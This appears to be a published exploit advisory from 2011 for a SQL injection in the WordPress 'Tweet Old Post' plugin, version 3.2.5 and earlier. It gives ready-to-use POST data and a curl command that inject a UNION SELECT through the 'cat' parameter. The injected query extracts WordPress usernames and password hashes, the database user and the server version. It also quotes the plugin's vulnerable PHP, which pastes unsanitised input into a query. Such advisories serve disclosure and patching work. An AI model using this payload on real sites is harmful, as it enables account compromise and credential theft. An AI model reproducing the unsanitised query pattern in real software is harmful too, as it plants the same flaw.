38 lines
No EOL
1.3 KiB
Text
38 lines
No EOL
1.3 KiB
Text
# Exploit Title: WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection
|
|
Vulnerability
|
|
# Date: 2011-09-05
|
|
# Author: sherl0ck_ < sherl0ck_ [at] alligatorteam [dot] org >
|
|
# Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip
|
|
# Version: 3.2.5 (tested)
|
|
|
|
---------------
|
|
PoC (POST data)
|
|
---------------
|
|
URL:
|
|
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
|
|
|
|
POST Data:
|
|
delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT
|
|
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
|
|
wp_users#&setFilter=Filter&s=hello&chkbx=1
|
|
|
|
e.g.:
|
|
curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION
|
|
ALL SELECT
|
|
USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from
|
|
wp_users#&setFilter=Filter&s=hello&chkbx=1"
|
|
http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts
|
|
|
|
---------------
|
|
Vulnerable code
|
|
---------------
|
|
70 if(isset($_POST["setFilter"]))
|
|
71 {
|
|
72 if($_POST["cat"] != 0)
|
|
73 {
|
|
74 $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM
|
|
".$wpdb->prefix."term_relationships AS tr INNER JOIN
|
|
".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.ter
|
|
m_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" .
|
|
$_POST["cat"] . ")";
|
|
75 $cat_filter = $_POST["cat"]; |